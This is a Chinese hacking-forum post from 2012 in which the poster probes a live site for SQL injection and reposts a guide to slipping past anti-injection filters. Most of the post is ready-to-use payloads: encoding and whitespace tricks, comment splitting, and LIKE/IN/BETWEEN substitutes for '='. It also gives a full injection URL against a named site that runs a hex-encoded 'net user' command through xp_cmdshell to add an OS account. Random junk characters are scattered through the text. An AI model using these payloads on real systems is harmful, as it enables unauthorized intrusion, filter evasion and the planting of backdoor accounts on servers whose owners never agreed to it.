找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2292|回复: 0
打印 上一主题 下一主题

饶过防注入系统方法总结

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:47:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
路过这个网站,检测了一下.: j8 V: T7 Q+ v0 s6 q5 X" `: w
http://www.xxx.cn/Article.asp?ID=117 and 1=1) ]0 _& K: h6 ^+ S6 B. j( r) E0 \
直接返回主页7 i7 b$ a* ?, C# H
http://www.xxx.cn/Article.asp?ID=117 or 1=10 ^; N' Z1 |; K
直接返回主页2 p1 C! I0 Z9 Z" k! E
http://www.xxx.cn/Article.asp?ID=117 or4 V$ ]& y9 I6 i- S4 S
没有返回主页 没有过滤or
! b+ v( S% D% Ahttp://www.xxx.cn/Article.asp?ID=117 and# r1 t; Q- }3 V  @
直接返回主页 看来过滤了and4 E! n  f/ D$ h
http://www.xxx.cn/Article.asp?ID=117 or 1
) e5 I7 z* y- V: Y$ P: F% y8 o! T  J没有返回主页 即没有过滤or 也没有过滤18 Z3 [/ w: o( n& G5 C4 g! B% P; ?
http://www.xxx.cn/Article.asp?ID=117 or 1=1& G7 ]  e4 l1 U
直接返回主页 很明显过滤了等号 # S/ `% P" ^5 }, L
or的特性是与and相反的.7 q% p" Z; E) p" x5 u& ^, v* u8 @4 e
or 1=1 爆错 或与原页面不同, O7 h: I$ ^  `& J
or 1=2 原页面相同( U  x% `  C! r5 ]
这样就是一个注入点( t" l  J6 o+ t2 V  L( Z1 B
但他过滤了=号 我就用><号代替=号吧!9 j: k: D7 L# k9 D* d. S
or 1<2 很明显是正确的,所以应该与原页面不同
  P/ K1 n  _+ Oor 1>2 很明显是错误的,所以应该与原页面相同
( x, \- F8 \6 J. e0 p然后看看有没有过滤其他的查询语句,比如select.+ f/ o8 @9 p* l8 Q
http://www.xxx.cn/Article.asp?ID=117 select
2 z: l  f. `, {: s# d. i# o, B直接返回主页& O. r# W! p/ j* h) V
又迷茫了..
1 C$ Y  D# _) f% Z# f+ V. o9 S
- ~, _  C* Q1 a9 v4 M7 I" e; z6 m: K" r0 v- l- [, Y! p$ X
cookies注入.和以下的方法全都试过了,都失败了.还有什么方法可以饶过吗7 @4 R+ d7 o* V* O
这个系统我以为是my动力,后台却是这样的http://www.xxx.cn/admin.asp(应该不是假够台吧)2 Y9 \' E) v6 x+ R$ }7 @
================================================! O' K6 T& @+ G1 j0 r# \: v
以下是转贴:' [5 `6 W) Z: y) J5 B0 x( [
* e& B  x, a3 `: X9 [
突然想我们是否可以用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是针对AND与“’”号和“=”号过滤的突破,虽然有点进步的地方,但还是有一些关键字没有绕过,由于我不常入侵网站所以也不敢对上述过滤的效果进行评论,但是可以肯定的是,效果不会很好……
' U. \" _: L. a* b经过我的收集,大部分的防注入程序都过滤了以下关键字: % d4 a+ e( o" Z5 z2 ^2 m
and | select | update | chr | delete | %20from | ; | insert | mid | master. | set | =
" @( \$ O! t: ^$ n9 K2 }而这里最难处理的就是select这个关键字了,那么我们怎样来突破他们呢?问题虽未完全解决,但还是说出来与大家分享一下,希望能抛砖引玉。 % O4 W$ b* W% \2 p
对于关键字的过滤,以下是我收集的以及我个人的一些想法。
7 s- h& M4 h# f; Z! W5 o2 X- ~1、运用编码技术绕过 1 c$ b" E, {& b. N) i$ {5 Q
如URLEncode编码,ASCII编码绕过。例如or 1=1即
, R7 b. `! G' M: `8 z3 K. @; j+ _%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。 ; a- C; E5 z& Y, t; Z+ b  {( I

- c6 R* j, I% X$ c& x2 b1 r2、通过空格绕过
  k+ Y1 z' H$ Q6 \: s如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如
+ G7 q' s6 Z( n" v8 ~3 Z3 j* bor’ swords’ =‘swords’ ' K0 V; i+ u, A6 O3 u5 _& j
,由于mssql的松散性,我们可以把or ’swords’ 之间的空格去掉,并不影响运行。 3 b8 l6 F( q7 W
3、运用字符串判断代替
- O4 m: B4 ]7 a' j+ i用经典的or 1=1判断绕过,如 3 Z$ Z: u# J. R1 U' Q7 x
or ’swords’ =’swords’
( R1 X1 @* b  p* \' X8 @4 _! F, z,这个方法就是网上在讨论的。 / Z( I  t0 b( `: K1 _/ b# Q
4、通过类型转换修饰符N绕过 # x( F2 c1 D2 L- M3 f7 w
可以说这是一个不错的想法,他除了能在某种程度上绕过限制,而且还有别的作用,大家自己好好想想吧。关于利用,如or ’swords’ = N’ swords’ ,大写的N告诉mssql server 字符串作为nvarchar类型,它起到类型转换的作用,并不影响注射语句本身,但是可以避过基于知识的模式匹配IDS。 8 P/ B- J1 V3 A+ G/ p/ D
5、通过+号拆解字符串绕过 % v# u" n, Q7 p0 y  y& ?( e
效果值得考证,但毕竟是一种方法。如 . ]7 N0 [# y0 U0 [' l$ v
or ’swords’ =‘sw’ +’ ords’ ;EXEC(‘IN’ +’ SERT INTO ’+’ …..’ )
2 }) d* o9 j  F) y0 f. V8 @5 O
& f5 W1 r! C+ ]8 s2 |6、通过LIKE绕过 & A1 Q, N. O- a  h, R
以前怎么就没想到呢?如or 8 L7 v" }8 k5 {& o
’swords’ LIKE ’sw’ ; J$ H7 g. N- ?+ O( W' G+ v6 b$ R/ d
!!!显然可以很轻松的绕过 - j% f7 N# N2 \, M% _) a
“=”“>” 0 b: C; Q- u  B' E0 ~! `& v8 ?* q
的限制…… 3 p, z# Q& k1 V0 A; d* e5 |
7、通过IN绕过
; ?8 W) G9 T$ [( H与上面的LIKE的思路差不多,如
% A6 t/ w* W2 Hor ’swords’ IN (’swords’)
9 y( l1 x6 }% j3 T, y4 x; W
; `9 i/ b: @  s# Y7 y+ Q! }8、通过BETWEEN绕过
1 b% P8 d/ a0 \4 ^& \" Q2 d3 c
4 _4 @) R1 [, o) K. bor ’swords’ BETWEEN ’rw’ AND ’tw’ 9 w% l# W9 q: m+ m$ ]4 i) n* m

2 x* v+ j0 x- {* Q7 ~$ i5 U: T9、通过>或者<绕过 - b2 b4 {2 R5 K5 g2 U% ~6 j
or ’swords’ > ’sw’ % X1 x, @2 w' D5 Q
or ’swords’ < ’tw’ ! C/ J8 ^; F$ F2 K0 m
or 1<3 % }. X2 z$ g" |' U
……
$ h/ k* X6 L" E10、运用注释语句绕过
; i" u0 Q" x+ m) W, o& h4 k用/**/代替空格,如: : w4 n' ~6 @7 E
UNION /**/ Select /**/user,pwd,from tbluser
# H4 [. H' {5 {$ H4 @) w$ o$ P* M0 R4 y7 V# {* k
用/**/分割敏感词,如: , b; o" t* Y& H9 ~6 t
U/**/ NION /**/ SE/**/ LECT /**/user,pwd from tbluser
1 U) Y5 e/ O2 _: Y/ N: \: ?
8 ]# k- b0 A; K! t% Q, G* |$ n11、用HEX绕过,一般的IDS都无法检测出来 8 c) n1 x" U; Q9 I9 B  }1 Q! G
0x730079007300610064006D0069006E00 =hex(sysadmin)
+ s1 G7 n, X' h# N7 Z% D0x640062005F006F0077006E0065007200 =hex(db_owner) 1 l# }  q6 |/ l0 x$ l6 i& V
另外,关于通用点的过滤方法,我们可以考虑采用赋值的方法,例如先声明一个变量a,然后把我们的指令赋值给a,然后调用变量a最终执行我们输入的命令。变量a可以是任何命令。如下: ) ?+ e! u: C) N3 v/ V7 k
  declare @a sysname
7 H- x+ z# y' n- b, f  select @a=
- E& R$ k! ^0 G8 V, H9 I3 w6 R. k  exec master.dbo.xp_cmdshell @a % Z8 h) ]! @/ |% f# D5 k
效果 6 w% Z( S! E5 Z- s
http://www.ilikeplmm.com/show.asp?id=1;declare%20@a% [email=20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a]20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a[/email];-- , z, q1 a5 M6 _. d4 ~- ?5 v5 R
- W& |# N7 I5 |6 `3 p/ p7 @" c
其中的 6 ~7 u+ P, B& n! B  h& k
0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400 5 S  D1 e3 x& @0 N0 Q, s+ S
就是 8 z/ K2 b' T; z3 l" w. R3 B
“net user angel pass /add”
# D. u$ n& O1 U3 |  X! i' @
. N2 b( l9 M- |5 h" c一直以来都以为只有空格,tab键和注释符/**/可以用来切割sql关键字,段时间在邪八看了风迅cms注入漏洞那篇帖子,才知道原来回车也可以用来作为分割符(以前竟然没有想到,真是失败)。回车的ascii码是chr(13)&chr(10),至于为什么要两个连在一起,这个我也不知道。转换成url编码形式是%0d%0a,于是就可以用%0d%0a代替空格pass一些过滤空格的检查了。, O* {1 C6 V, h, O) z( q
引申一下,只用%0d能正常执行语句吗?只用%0a呢?测试证明,用任意一种分割在mssql、mysql和access里面都是可以的。& S1 B1 Y  c! @! |: B- {1 k' n
另外,关于mssql的多语句问题。我以前一直以为必须用分号作为语句的结尾,后来发现,完全不是那样。类似7 B  ?  S; s* @8 d3 d3 m
Copy code1 K6 z0 B( A9 q; n' L$ L; ?
select * from table exec xp_cmdshell'xxxxxxxxxx'7 @( T) d& O$ u: h) B
9 E' L/ c; i) G3 c
2 y$ b. n! C# @% N4 R" p
select * from table/**/exec xp_cmdshell'xxxxxxxxxx'" Z, H7 N3 Y9 `  g" }" f

+ w1 R: p- W5 i/ g$ b( _# n
: ^$ d7 X6 \6 h9 cselect * from table|---tab---|exec xp_cmdshell'xxxxxxxxxx'; P$ B* f0 f6 `2 ~
+ V5 ?. K# S- j9 s' Y2 E: W

: _& I! S' s2 e3 mselect * from table|---enter---|exec xp_cmdshell'xxxxxxxxxx'5 {) Q+ ]$ ^5 N+ r
9 N5 _1 h  Y) a$ A- v" e! w; x
的语句都是可以正常执行的。而我以前竟然一直不知道!不过这个貌似跟连接数据库驱动有关系,odbc可以正常执行,sqloledb的话就会报错。有兴趣的继续研究吧?( i* V8 @7 V* k; A, I

2 I7 \0 ?( P/ ~: ?这样,以后遇到带空格过滤关键字的拦截程序,又可以发挥发挥了
5 Z& ~/ ?. x+ D可能大家早就知道了,不管怎么说,发在这里吧!" J2 k" _' ]0 W! U9 ]6 I

, l  I- g, {( w' U) A最近想起可能还有些ascii码可以用来在sql语句中代替空格,于是写个脚本测试了一下,结果在所有128个低位ascii字符中,chr(12)也可以在access里用,不过貌似chr(12)不能出现在and、or之类的关键词附近,原因不清楚。mysql中比access多一个chr(11)可以。至于mssql,挖日,直接从1到32的ascii码换成字符后都可以正常使用。
( p7 K' T! ], d6 W- p" E
0 C) r6 X" Y5 w6 B1 x  |5 z7 |, Y
1 J9 o8 G) r* [
对于中间应该出现空格的地方,用()进行替换,不过,对于很复杂的SQL语句就不太好用了。上面说到的是字符型的,如果是数值型,可以在id=1后加一个括号,不过这个我没有测试,1 D- a1 y9 z0 x+ z9 ^
比如:jmdcw.asp?id=(1)and(select.....),应该是可行的吧? 8 A3 U" }( C$ U) T. o
. n4 R: S9 t, Y$ m0 S1 {* K& q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表